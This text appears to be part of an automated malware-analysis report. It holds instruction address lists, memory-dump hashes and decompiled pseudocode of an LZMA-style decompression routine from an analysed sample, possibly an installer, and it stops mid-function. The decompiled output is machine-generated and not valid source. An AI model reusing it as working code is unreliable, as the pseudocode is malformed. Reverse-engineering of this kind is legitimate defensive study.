                                                                                                                          0x00406756
                                                                                                                          0x00406759
                                                                                                                          0x0040675d
                                                                                                                          0x0040675f
                                                                                                                          0x0040675f
                                                                                                                          0x00406760
                                                                                                                          0x00406763
                                                                                                                          0x00406739
                                                                                                                          0x00406739
                                                                                                                          0x00406741
                                                                                                                          0x00406746
                                                                                                                          0x00406748
                                                                                                                          0x0040674b
                                                                                                                          0x0040674b
                                                                                                                          0x00406766
                                                                                                                          0x0040676d
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040640b
                                                                                                                          0x0040640e
                                                                                                                          0x00406444
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657c
                                                                                                                          0x00406806
                                                                                                                          0x00000000
                                                                                                                          0x00406806
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040658b
                                                                                                                          0x0040658f
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00000000
                                                                                                                          0x00406592
                                                                                                                          0x00406410
                                                                                                                          0x00406412
                                                                                                                          0x00406414
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641c
                                                                                                                          0x0040641e
                                                                                                                          0x00406421
                                                                                                                          0x00406424
                                                                                                                          0x0040643a
                                                                                                                          0x0040643f
                                                                                                                          0x00406477
                                                                                                                          0x00406477
                                                                                                                          0x0040647b
                                                                                                                          0x004064a7
                                                                                                                          0x004064a9
                                                                                                                          0x004064b0
                                                                                                                          0x004064b3
                                                                                                                          0x004064b6
                                                                                                                          0x004064b6
                                                                                                                          0x004064bb
                                                                                                                          0x004064bb
                                                                                                                          0x004064bd
                                                                                                                          0x004064c0
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064f7
                                                                                                                          0x004064f7
                                                                                                                          0x004064fa
                                                                                                                          0x004064fd
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00000000
                                                                                                                          0x00406571
                                                                                                                          0x004064ff
                                                                                                                          0x00406505
                                                                                                                          0x00406508
                                                                                                                          0x0040650b
                                                                                                                          0x0040650e
                                                                                                                          0x00406511
                                                                                                                          0x00406514
                                                                                                                          0x00406517
                                                                                                                          0x0040651a
                                                                                                                          0x0040651d
                                                                                                                          0x00406520
                                                                                                                          0x00406539
                                                                                                                          0x0040653b
                                                                                                                          0x0040653e
                                                                                                                          0x0040653f
                                                                                                                          0x00406542
                                                                                                                          0x00406544
                                                                                                                          0x00406547
                                                                                                                          0x00406549
                                                                                                                          0x0040654b
                                                                                                                          0x0040654e
                                                                                                                          0x00406550
                                                                                                                          0x00406553
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655a
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406522
                                                                                                                          0x00406522
                                                                                                                          0x0040652a
                                                                                                                          0x0040652f
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406534
                                                                                                                          0x00406563
                                                                                                                          0x0040656a
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x0040656a
                                                                                                                          0x0040647d
                                                                                                                          0x00406480
                                                                                                                          0x00406482
                                                                                                                          0x00406485
                                                                                                                          0x00406488
                                                                                                                          0x0040648b
                                                                                                                          0x0040648d
                                                                                                                          0x00406490
                                                                                                                          0x00406493
                                                                                                                          0x00406493
                                                                                                                          0x00406496
                                                                                                                          0x00406496
                                                                                                                          0x00406499
                                                                                                                          0x004064a0
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a0
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040618d
                                                                                                                          0x0040618d
                                                                                                                          0x00406191
                                                                                                                          0x004067d6
                                                                                                                          0x00000000
                                                                                                                          0x004067d6
                                                                                                                          0x00406197
                                                                                                                          0x0040619a
                                                                                                                          0x0040619d
                                                                                                                          0x004061a0
                                                                                                                          0x004061a3
                                                                                                                          0x004061a6
                                                                                                                          0x004061a9
                                                                                                                          0x004061ab
                                                                                                                          0x004061ae
                                                                                                                          0x004061b1
                                                                                                                          0x004061b4
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406318
                                                                                                                          0x00406318
                                                                                                                          0x0040631c
                                                                                                                          0x004067e2
                                                                                                                          0x00000000
                                                                                                                          0x004067e2
                                                                                                                          0x00406322
                                                                                                                          0x00406325
                                                                                                                          0x00406328
                                                                                                                          0x0040632b
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x00406330
                                                                                                                          0x00406333
                                                                                                                          0x00406336
                                                                                                                          0x00406339
                                                                                                                          0x0040633c
                                                                                                                          0x0040633f
                                                                                                                          0x00406340

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 204a14aa4723f8bacec733d7555320540fe203445ac57d520a52ca53e11fdb0c
                                                                                                                          • Instruction ID: aa40489b15165fca9e2d73c9723ecf3d5b4a768092768a0400057c9dc9ec6b69
                                                                                                                          • Opcode Fuzzy Hash: 204a14aa4723f8bacec733d7555320540fe203445ac57d520a52ca53e11fdb0c
                                                                                                                          • Instruction Fuzzy Hash: F6714471D04229CFDF28CF98C844BAEBBB1FB44305F25816AD816BB281D7785A86DF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E004062B1() {
                                                                                                                          				unsigned short _t531;
                                                                                                                          				signed int _t532;
                                                                                                                          				void _t533;
                                                                                                                          				signed int _t534;
                                                                                                                          				signed int _t535;
                                                                                                                          				signed int _t565;
                                                                                                                          				signed int _t568;
                                                                                                                          				signed int _t589;
                                                                                                                          				signed int* _t606;
                                                                                                                          				void* _t613;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					if( *(_t613 - 0x40) != 0) {
                                                                                                                          						 *(_t613 - 0x84) = 0xa;
                                                                                                                          						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                                                                          					} else {
                                                                                                                          						 *(__ebp - 0x84) = 9;
                                                                                                                          						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                          					}
                                                                                                                          					while(1) {
                                                                                                                          						 *(_t613 - 0x54) = _t606;
                                                                                                                          						while(1) {
                                                                                                                          							L133:
                                                                                                                          							_t531 =  *_t606;
                                                                                                                          							_t589 = _t531 & 0x0000ffff;
                                                                                                                          							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                          							if( *(_t613 - 0xc) >= _t565) {
                                                                                                                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                          								 *(_t613 - 0x40) = 1;
                                                                                                                          								_t532 = _t531 - (_t531 >> 5);
                                                                                                                          								 *_t606 = _t532;
                                                                                                                          							} else {
                                                                                                                          								 *(_t613 - 0x10) = _t565;
                                                                                                                          								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                          							}
                                                                                                                          							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                          								goto L139;
                                                                                                                          							}
                                                                                                                          							L137:
                                                                                                                          							if( *(_t613 - 0x6c) == 0) {
                                                                                                                          								 *(_t613 - 0x88) = 5;
                                                                                                                          								L170:
                                                                                                                          								_t568 = 0x22;
                                                                                                                          								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                          								_t535 = 0;
                                                                                                                          								L172:
                                                                                                                          								return _t535;
                                                                                                                          							}
                                                                                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                          							L139:
                                                                                                                          							_t533 =  *(_t613 - 0x84);
                                                                                                                          							while(1) {
                                                                                                                          								 *(_t613 - 0x88) = _t533;
                                                                                                                          								while(1) {
                                                                                                                          									L1:
                                                                                                                          									_t534 =  *(_t613 - 0x88);
                                                                                                                          									if(_t534 > 0x1c) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
                                                                                                                          										case 0:
                                                                                                                          											if( *(_t613 - 0x6c) == 0) {
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          											_t534 =  *( *(_t613 - 0x70));
                                                                                                                          											if(_t534 > 0xe1) {
                                                                                                                          												goto L171;
                                                                                                                          											}
                                                                                                                          											_t538 = _t534 & 0x000000ff;
                                                                                                                          											_push(0x2d);
                                                                                                                          											asm("cdq");
                                                                                                                          											_pop(_t570);
                                                                                                                          											_push(9);
                                                                                                                          											_pop(_t571);
                                                                                                                          											_t609 = _t538 / _t570;
                                                                                                                          											_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                          											asm("cdq");
                                                                                                                          											_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                          											 *(_t613 - 0x3c) = _t604;
                                                                                                                          											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                          											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                          											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                          											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                          												L10:
                                                                                                                          												if(_t612 == 0) {
                                                                                                                          													L12:
                                                                                                                          													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          													goto L15;
                                                                                                                          												} else {
                                                                                                                          													goto L11;
                                                                                                                          												}
                                                                                                                          												do {
                                                                                                                          													L11:
                                                                                                                          													_t612 = _t612 - 1;
                                                                                                                          													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                          												} while (_t612 != 0);
                                                                                                                          												goto L12;
                                                                                                                          											}
                                                                                                                          											if( *(_t613 - 4) != 0) {
                                                                                                                          												GlobalFree( *(_t613 - 4));
                                                                                                                          											}
                                                                                                                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          											 *(_t613 - 4) = _t534;
                                                                                                                          											if(_t534 == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											} else {
                                                                                                                          												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                          												goto L10;
                                                                                                                          											}
                                                                                                                          										case 1:
                                                                                                                          											L13:
                                                                                                                          											__eflags =  *(_t613 - 0x6c);
                                                                                                                          											if( *(_t613 - 0x6c) == 0) {
                                                                                                                          												 *(_t613 - 0x88) = 1;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          											_t45 = _t613 - 0x48;
                                                                                                                          											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                          											__eflags =  *_t45;
                                                                                                                          											L15:
                                                                                                                          											if( *(_t613 - 0x48) < 4) {
                                                                                                                          												goto L13;
                                                                                                                          											}
                                                                                                                          											_t546 =  *(_t613 - 0x40);
                                                                                                                          											if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                          												L20:
                                                                                                                          												 *(_t613 - 0x48) = 5;
                                                                                                                          												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                          												goto L23;
                                                                                                                          											}
                                                                                                                          											 *(_t613 - 0x74) = _t546;
                                                                                                                          											if( *(_t613 - 8) != 0) {
                                                                                                                          												GlobalFree( *(_t613 - 8)); // executed
                                                                                                                          											}
                                                                                                                          											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                          											 *(_t613 - 8) = _t534;
                                                                                                                          											if(_t534 == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											} else {
                                                                                                                          												goto L20;
                                                                                                                          											}
                                                                                                                          										case 2:
                                                                                                                          											L24:
                                                                                                                          											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                          											 *(_t613 - 0x84) = 6;
                                                                                                                          											 *(_t613 - 0x4c) = _t553;
                                                                                                                          											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                          											 *(_t613 - 0x54) = _t606;
                                                                                                                          											goto L133;
                                                                                                                          										case 3:
                                                                                                                          											L21:
                                                                                                                          											__eflags =  *(_t613 - 0x6c);
                                                                                                                          											if( *(_t613 - 0x6c) == 0) {
                                                                                                                          												 *(_t613 - 0x88) = 3;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          											_t67 = _t613 - 0x70;
                                                                                                                          											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          											__eflags =  *_t67;
                                                                                                                          											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                          											L23:
                                                                                                                          											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                          											if( *(_t613 - 0x48) != 0) {
                                                                                                                          												goto L21;
                                                                                                                          											}
                                                                                                                          											goto L24;
                                                                                                                          										case 4:
                                                                                                                          											L133:
                                                                                                                          											_t531 =  *_t606;
                                                                                                                          											_t589 = _t531 & 0x0000ffff;
                                                                                                                          											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                          											if( *(_t613 - 0xc) >= _t565) {
                                                                                                                          												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                          												 *(_t613 - 0x40) = 1;
                                                                                                                          												_t532 = _t531 - (_t531 >> 5);
                                                                                                                          												 *_t606 = _t532;
                                                                                                                          											} else {
                                                                                                                          												 *(_t613 - 0x10) = _t565;
                                                                                                                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                          											}
                                                                                                                          											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                          												goto L139;
                                                                                                                          											}
                                                                                                                          										case 5:
                                                                                                                          											goto L137;
                                                                                                                          										case 6:
                                                                                                                          											__edx = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x34) = 1;
                                                                                                                          												 *(__ebp - 0x84) = 7;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                          												while(1) {
                                                                                                                          													 *(_t613 - 0x54) = _t606;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                          											__esi =  *(__ebp - 0x60);
                                                                                                                          											__cl = 8;
                                                                                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                          											__ecx =  *(__ebp - 0x3c);
                                                                                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          											if( *(__ebp - 0x38) >= 4) {
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                          													_t98 = __ebp - 0x38;
                                                                                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                          													__eflags =  *_t98;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x38) = 0;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                          											if( *(__ebp - 0x34) == __edx) {
                                                                                                                          												__ebx = 0;
                                                                                                                          												__ebx = 1;
                                                                                                                          												goto L61;
                                                                                                                          											} else {
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          													__eflags = __eax;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 8);
                                                                                                                          												__ebx = 0;
                                                                                                                          												__ebx = 1;
                                                                                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          												goto L41;
                                                                                                                          											}
                                                                                                                          										case 7:
                                                                                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                          											if( *(__ebp - 0x40) != 1) {
                                                                                                                          												__eax =  *(__ebp - 0x24);
                                                                                                                          												 *(__ebp - 0x80) = 0x16;
                                                                                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          												__eax =  *(__ebp - 0x28);
                                                                                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          												__eax = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          												__al = __al & 0x000000fd;
                                                                                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												 *(__ebp - 0x58) = __eax;
                                                                                                                          												goto L69;
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 4);
                                                                                                                          											__ecx =  *(__ebp - 0x38);
                                                                                                                          											 *(__ebp - 0x84) = 8;
                                                                                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                          											while(1) {
                                                                                                                          												 *(_t613 - 0x54) = _t606;
                                                                                                                          												goto L133;
                                                                                                                          											}
                                                                                                                          										case 8:
                                                                                                                          											goto L0;
                                                                                                                          										case 9:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												goto L89;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x60);
                                                                                                                          											if( *(__ebp - 0x60) == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											}
                                                                                                                          											__eax = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                          											__eflags = _t258;
                                                                                                                          											0 | _t258 = _t258 + _t258 + 9;
                                                                                                                          											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                          											goto L75;
                                                                                                                          										case 0xa:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x84) = 0xb;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                          												while(1) {
                                                                                                                          													 *(_t613 - 0x54) = _t606;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x28);
                                                                                                                          											goto L88;
                                                                                                                          										case 0xb:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__ecx =  *(__ebp - 0x24);
                                                                                                                          												__eax =  *(__ebp - 0x20);
                                                                                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          											} else {
                                                                                                                          												__eax =  *(__ebp - 0x24);
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x28);
                                                                                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          											L88:
                                                                                                                          											__ecx =  *(__ebp - 0x2c);
                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          											L89:
                                                                                                                          											__eax =  *(__ebp - 4);
                                                                                                                          											 *(__ebp - 0x80) = 0x15;
                                                                                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                          											goto L69;
                                                                                                                          										case 0xc:
                                                                                                                          											L99:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xc;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t334 = __ebp - 0x70;
                                                                                                                          											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t334;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											__eax =  *(__ebp - 0x2c);
                                                                                                                          											goto L101;
                                                                                                                          										case 0xd:
                                                                                                                          											L37:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xd;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t122 = __ebp - 0x70;
                                                                                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t122;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L39:
                                                                                                                          											__eax =  *(__ebp - 0x40);
                                                                                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                          												goto L48;
                                                                                                                          											}
                                                                                                                          											__eflags = __ebx - 0x100;
                                                                                                                          											if(__ebx >= 0x100) {
                                                                                                                          												goto L54;
                                                                                                                          											}
                                                                                                                          											L41:
                                                                                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                          											 *(__ebp - 0x48) = __eax;
                                                                                                                          											__eax = __eax + 1;
                                                                                                                          											__eax = __eax << 8;
                                                                                                                          											__eax = __eax + __ebx;
                                                                                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          											__ax =  *__esi;
                                                                                                                          											 *(__ebp - 0x54) = __esi;
                                                                                                                          											__edx = __ax & 0x0000ffff;
                                                                                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												__cx = __ax;
                                                                                                                          												 *(__ebp - 0x40) = 1;
                                                                                                                          												__cx = __ax >> 5;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												__ebx = __ebx + __ebx + 1;
                                                                                                                          												 *__esi = __ax;
                                                                                                                          											} else {
